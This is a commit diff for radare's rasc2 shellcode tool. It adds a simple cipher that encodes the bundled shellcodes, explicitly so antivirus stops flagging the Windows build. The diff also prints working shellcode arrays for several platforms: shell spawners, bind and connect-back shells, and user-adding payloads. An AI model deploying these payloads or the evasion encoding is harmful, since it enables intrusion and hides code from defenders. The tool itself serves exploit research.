* Implement simple ciphering algorithm to bundle rasc2 shellcodes

- Should trick some silly antiviruses to stop claiming that
    the w32 build is malware
* Unify the python-config-wrapper scripts

--HG--
rename : binr/rasc2/shellcodes.c => binr/rasc2/shellcodes.c.src
This commit is contained in:
pancake 2011-05-15 03:33:31 +02:00
parent 7a4343aa1e
commit db61c1640a
10 changed files with 1057 additions and 961 deletions

View File

@ -14,7 +14,7 @@ all: ${BIN}${EXT_EXE}
${BIN}${EXT_EXE}: ${BIN}.o ${OBJS}
${CC} -o ${BIN}${EXT_EXE} ${OBJS} ${BIN}.o ${LIBS} ${LDFLAGS}
clean:
clean: ${MYCLEAN}
-rm -f ${BIN} ${BIN}.o ${OBJS}
mrproper: clean

View File

@ -1,5 +1,20 @@
BIN=rasc2
DEPS=
MYCLEAN=myclean
OBJS=shellcodes.o test.o
preall: shellcodes.c
${MAKE} all
xorhex: xorhex.o
${CC} xorhex.o -o xorhex
shellcodes.c: xorhex
./xorhex < shellcodes.c.src > shellcodes.c
./xorhex decode < shellcodes.c > shellcodes.c.new
diff -ru shellcodes.c.src shellcodes.c.new
myclean:
rm -f shellcodes.c xorhex.o
include ../binr.mk

View File

@ -177,7 +177,7 @@ int print_shellcode() {
/* patch addr and env */
otf_patch ();
memcpy(output+A+N+E, shellcode, scsize);
memcpy (output+A+N+E, shellcode, scsize);
for (i=0;i<C;i++)
output[i+A+E+N+scsize] = '\xCC';
@ -256,11 +256,26 @@ int hexpair2bin(const char *arg) { // (0A) => 10 || -1 (on error)
return (int)c;
}
void cipher_memcpy(ut8 *dst, ut8 *src, int len) {
int i, n;
for (i=0; i<len; i++) {
n = src[i] & 0xf;
n = n==0xf?0:n+1;
dst[i] = n;
n = src[i] & 0xf0;
n>>=4;
n = n==0xf?0:n+1;
dst[i] |= n<<4;
}
}
int load_shellcode_from_me(char *str) {
int i;
for (i=0;shellcodes[i].name;i++) {
for (i=0; shellcodes[i].name; i++) {
if (!strcmp (shellcodes[i].name, str)) {
memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
//memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
/* cipher shit */
cipher_memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
scsize = shellcodes[i].len;
scidx = i;
//printf("Using %d bytes shellcode (%s) %02x %02x\n", shellcodes[i].len, shellcodes[i].desc,
@ -293,7 +308,7 @@ int load_shellcode_from_string(char *str) {
return 0;
}
int file_type(char *str) {
static int file_type(char *str) {
if (!strcmp(str,"-"))
return 0; // stdin
if (!strcmp(str+strlen(str)-2,".s"))
@ -301,30 +316,31 @@ int file_type(char *str) {
return 2;
}
int load_shellcode_from_file(char *str) {
static int load_shellcode_from_file(char *str) {
char buf[1024];
char *ptr = NULL;
eprintf ("TODO: This is r1-dependant.. ugly . must dump all disasm\n");
str[1024]='\0';
switch (file_type (str)) {
case 0: // stdin
fprintf (stderr, "TODO\n");
break;
case 1: // .s file (assembly
sprintf(buf, "gcc -nostdlib -o .x %s", str);
system(buf);
system("rsc syms-dump .x | grep _start | cut -d : -f 2 | tee .y");
unlink(".x");
ptr = filetostr(".y");
unlink(".y");
sprintf (buf, "gcc -nostdlib -o .x %s", str);
system (buf);
system ("rsc syms-dump .x | grep _start | cut -d : -f 2 | tee .y");
unlink (".x");
ptr = filetostr (".y");
unlink (".y");
if (ptr) {
load_shellcode_from_string(ptr);
free(ptr);
}
break;
default:
printf("File format not supported\n");
exit(1);
eprintf ("File format not supported\n");
exit (1);
}
return 0;

View File

@ -1,934 +0,0 @@
/*
* Copyright (C) 2007
* pancake <@youterm.com>
*
* radare is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* radare is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with radare; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
// XXX: shellcodes are ended with '\0'. so they should not contain any '\0'
#include <stdio.h>
#include "rasc.h"
// moar at:
// http://www.groar.org/expl/openbsd/english.shtml
#if SELFSTOP
#define RET 0x80494c0
// 1) buscar jmp de 5 bytes
#define INJECT jmp $delta-$here-10
linux_selfsigstop:
push RET
/* 68 34 de 04 08 */
pusha
mov $20, %eax
int $0x80
mov %eax, %ebx /* pid */
mov $19, %ecx /* stop */
mov $37, %eax /* kill */
int $0x80
popa
ret
freebsd_selfsigstop:
push RET_ADDR
pusha
mov $20, %eax
push %ebp
int $0x80
pop %ebp
push $17
push %eax
mov $37, %eax
push %ebp
int $0x80
pop %ebp
pop %ebp
pop %ebp
popa
ret
#endif
#if 0
// dump warns and it has not been tested.. out!
/* from phrack57 */
unsigned long long ia64_linux_binsh[] = {
/* MLX
* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall
* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01
* ;; */
0x2f6e458006191005,
0x631132f1c0016873,
/* MLX
* xor r37 = r37, r37 // NULL
* movl r17 = 0x48f017994897c001 // bundle[0]
* ;; */
0x9948a00f4a952805,
0x6602e0122048f017,
/* MII
* adds r15 = 0x1094, r37 // unfinished bundle[1]
* or r22 = 0x08, r37 // part 1 of bundle[1]
* dep r12 = r37, r12, 0, 8 // align stack ptr
* ;; */
0x416021214a507801,
0x4fdc625180405c94,
/* MII
* adds r35 = -40, r12 // circling mem addr 1, shellstr addr
* adds r36 = -32, r12 // circling mem addr 2, args[0] addr
* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)
* ;; */
0x0240233f19611801,
0x41dc7961e0467e33,
/* MII
* st8 [r36] = r35, 16 // args[0] = shellstring addr
* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr
* or r23 = 0x42, r37 // part 2 of bundle[1]
* ;; */
0x81301598488c8001,
0x80b92c22e0467e33,
/* MII
* st8 [r36] = r17, 8 // store bundle[0]
* dep r14 = r37, r14, 56, 8 // fix shellstring
* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)
* ;; */
0x28e0159848444001,
0x4bdc7971e020ee39,
/* MMI
* st8 [r35] = r14, 25 // store shellstring
* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.
* mov b6 = r19 // (+0x01) setup branch reg
* ;; */
0x282015984638c801,
0x07010930c0701095,
/* MIB
* st8 [r36] = r15, -16 // store bundle[1]
* adds r35 = -25, r35 // correct string addr
* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle
* ;; */
0x3a301799483f8011,
0x0180016001467e8f,
};
#endif
unsigned char nopcode_carver[] ="\x61\x66\x3D\x90\x90\x75\xF9\x54\xc3";
unsigned char x86_linux_binsh[] =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
unsigned char x86_linux_binsh1[] = // -( nemo )-
"\xeb\x10\x5b\x31\xc0\x50\x53\xb0\x0b\x88\x63\x07\x89\xe1\x31\xd2\xcd\x80\xe8\xeb\xff\xff\xff/bin/shX";
/* 0xcafebabe.it */
unsigned char x86_linux_binsh2[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int mips_linux_binsh[] = {
0x00842026, 0x24020fb7, 0x0000000c, 0x3c086e69, 0x3508622f, 0x3c090068,
0x3529732f, 0xafa80000, 0xafa90004, 0xafbd0008, 0xafa0000c, 0x03a02021,
0x23a50008, 0x00003021, 0x24020fab, 0x0000000c, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000 };
char sparc_linux_binsh[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10";
/* javicoder shellcodes
--------------------- beerware license
http://www.48bits.com/papers/sparc_shellcodes.txt
*/
char sparc_linux_javicoder_binsh[] =
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
"\xdc\xda\x90\x0b\x80\x0e\x82\x10\x20\x0b"
"\x91\xd0\x20\x10\x82\x10\x20\x01\x90\x1a"
"\x40\x09\x91\xd0\x20\x10";
/* listen shell at port 1124 */
char sparc_linux_javicoder_portbind[] =
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46\xe4\x25"
"\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46\x84\x12\x22\xd0"
"\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea\x92\x12\x26\x66\xd2\x39"
"\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe\xa4\x09\xc1\xea\x96\x12\x22\x12"
"\xd2\x25\xa2\x46\xe4\x25\xa2\x4a\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2"
"\x22\x12\xa4\x12\x22\x03\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe"
"\xd6\x25\xa2\x4e\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29"
"\xc1\xfa\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80\x93\xd2"
"\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc\x92\x0d\x82\x10"
"\x84\x12\x22\x0d\x93\xd2\x22\x12";
#if 0
( .. 11 instructions .. ) (+44 bytes+deobfusacte+nops)
mov 0x464, %l1 ! puerto 1124
sethi %hi(0x0a0c2203), %l2 !
or %l2, %lo(0x0a0c2203), %l2 ! direcci?n IP 10.12.34.3
#endif
char sparc_linux_javicoder_connect[] =
/* rutina desofuscadora */
"\x10\x80\x00\x0c\xa4\x1c\x80\x12\xa2\x03\xe0\x08\xe8\x0c\x40\x05"
"\xa4\x04\xa0\x01\xa8\x25\x20\x02\xe8\x2c\x40\x05\x80\xa4\xa0\xc4"
"\x04\xbf\xff\xfb\xa2\x04\x60\x01\x8b\xc3\xe0\x08\xa4\x1c\x80\x12"
"\x7f\xff\xff\xf6\x8a\x19\x40\x05"
/*
* NOPs por la i-cache
*/
"\x03\x02\x02\x02\x03\x02\x02\x02"
/*
* shellcode ofuscada
*/
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46"
"\xe4\x25\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46"
"\x84\x12\x22\xd0\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea"
"\x92\x12\x26\x66\xd2\x39\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe"
"\xa4\x09\xc1\xea\x96\x12\x22\x12\xd2\x25\xa2\x46\xe4\x25\xa2\x4a"
"\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2\x22\x12\xa4\x12\x22\x03"
"\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe\xd6\x25\xa2\x4e"
"\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29\xc1\xfa"
"\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80"
"\x93\xd2\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc"
"\x92\x0d\x82\x10\x84\x12\x22\x0d\x93\xd2\x22\x12";
unsigned char x86_linux_bind4444[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
"\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
"\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
"\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
"\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
"\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";
unsigned char x86_linux_udp4444[] =
"\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
"\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
"\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
"\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
"\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
"\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
"\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";
unsigned char x86_linux_adduser[] =
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73"
"\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd"
"\x80\x93\xe8\x1f\x00\x00\x00\x78\x3a\x41\x7a\x37\x44\x71\x55\x7a\x47\x6a"
"\x77\x69\x4d\x77\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73"
"\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80";
unsigned char x86_bsd_binsh[] =
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51"
"\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd\x80";
unsigned char x86_bsd_binsh2[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53"
"\x50\xb0\x3b\xcd\x80";
unsigned char x86_bsd_bind4444[] =
"\x31\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
"\xd3\x61\x53\x83\xeb\xfc\xe2\xf4\xa4\xb2\x39\xca\x9c\xbb\x71\x51"
"\xdf\x8f\xe8\xb2\x9c\x91\x33\x11\x9c\xb9\x71\x9e\x4e\x4a\xf2\x02"
"\x9d\x81\x0b\x3b\x96\x1e\xe1\xe3\xa4\x1e\xe1\x01\x9d\x81\xd1\x4d"
"\x03\x53\xf6\x39\xcc\x8a\x0b\x09\x96\x82\x36\x02\x03\x53\x28\x2a"
"\x3b\x83\x09\x7c\xe1\xa0\x09\x3b\xe1\xb1\x08\x3d\x47\x30\x31\x07"
"\x9d\x80\xd1\x68\x03\x53\x61\x53";
unsigned char ppc_osx_binsh[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";
unsigned char ppc_osx_bind4444[] =
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";
unsigned char x86_w32_bind4444[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9f"
"\x2a\xdf\x1b\x83\xeb\xfc\xe2\xf4\x63\x40\x34\x56\x77\xd3\x20\xe4"
"\x60\x4a\x54\x77\xbb\x0e\x54\x5e\xa3\xa1\xa3\x1e\xe7\x2b\x30\x90"
"\xd0\x32\x54\x44\xbf\x2b\x34\x52\x14\x1e\x54\x1a\x71\x1b\x1f\x82"
"\x33\xae\x1f\x6f\x98\xeb\x15\x16\x9e\xe8\x34\xef\xa4\x7e\xfb\x33"
"\xea\xcf\x54\x44\xbb\x2b\x34\x7d\x14\x26\x94\x90\xc0\x36\xde\xf0"
"\x9c\x06\x54\x92\xf3\x0e\xc3\x7a\x5c\x1b\x04\x7f\x14\x69\xef\x90"
"\xdf\x26\x54\x6b\x83\x87\x54\x5b\x97\x74\xb7\x95\xd1\x24\x33\x4b"
"\x60\xfc\xb9\x48\xf9\x42\xec\x29\xf7\x5d\xac\x29\xc0\x7e\x20\xcb"
"\xf7\xe1\x32\xe7\xa4\x7a\x20\xcd\xc0\xa3\x3a\x7d\x1e\xc7\xd7\x19"
"\xca\x40\xdd\xe4\x4f\x42\x06\x12\x6a\x87\x88\xe4\x49\x79\x8c\x48"
"\xcc\x79\x9c\x48\xdc\x79\x20\xcb\xf9\x42\xce\x47\xf9\x79\x56\xfa"
"\x0a\x42\x7b\x01\xef\xed\x88\xe4\x49\x40\xcf\x4a\xca\xd5\x0f\x73"
"\x3b\x87\xf1\xf2\xc8\xd5\x09\x48\xca\xd5\x0f\x73\x7a\x63\x59\x52"
"\xc8\xd5\x09\x4b\xcb\x7e\x8a\xe4\x4f\xb9\xb7\xfc\xe6\xec\xa6\x4c"
"\x60\xfc\x8a\xe4\x4f\x4c\xb5\x7f\xf9\x42\xbc\x76\x16\xcf\xb5\x4b"
"\xc6\x03\x13\x92\x78\x40\x9b\x92\x7d\x1b\x1f\xe8\x35\xd4\x9d\x36"
"\x61\x68\xf3\x88\x12\x50\xe7\xb0\x34\x81\xb7\x69\x61\x99\xc9\xe4"
"\xea\x6e\x20\xcd\xc4\x7d\x8d\x4a\xce\x7b\xb5\x1a\xce\x7b\x8a\x4a"
"\x60\xfa\xb7\xb6\x46\x2f\x11\x48\x60\xfc\xb5\xe4\x60\x1d\x20\xcb"
"\x14\x7d\x23\x98\x5b\x4e\x20\xcd\xcd\xd5\x0f\x73\x6f\xa0\xdb\x44"
"\xcc\xd5\x09\xe4\x4f\x2a\xdf\x1b\x00";
unsigned char x86_w32_tcp4444[] =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
"\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
"\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
"\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
"\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
"\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
"\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
"\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
"\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
"\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
"\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
"\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
"\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
"\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
"\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
"\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
"\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
"\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
"\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
"\x7e\xe5\x98\xec\xac\x45\x1b\x13";
char x86_w32_msg[]=
"\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
#if 0
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
#endif
unsigned char x86_w32_adduser[] =
"\x31\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x5e\x22\xde\x83\xeb\xfc\xe2\xf4\x14\xb6\x66\xde\xe8\x5e\xa9\x9b"
"\xd4\xd5\x5e\xdb\x90\x5f\xcd\x55\xa7\x46\xa9\x81\xc8\x5f\xc9\x97"
"\x63\x6a\xa9\xdf\x06\x6f\xe2\x47\x44\xda\xe2\xaa\xef\x9f\xe8\xd3"
"\xe9\x9c\xc9\x2a\xd3\x0a\x06\xda\x9d\xbb\xa9\x81\xcc\x5f\xc9\xb8"
"\x63\x52\x69\x55\xb7\x42\x23\x35\x63\x42\xa9\xdf\x03\xd7\x7e\xfa"
"\xec\x9d\x13\x1e\x8c\xd5\x62\xee\x6d\x9e\x5a\xd2\x63\x1e\x2e\x55"
"\x98\x42\x8f\x55\x80\x56\xc9\xd7\x63\xde\x92\xde\xe8\x5e\xa9\xb6"
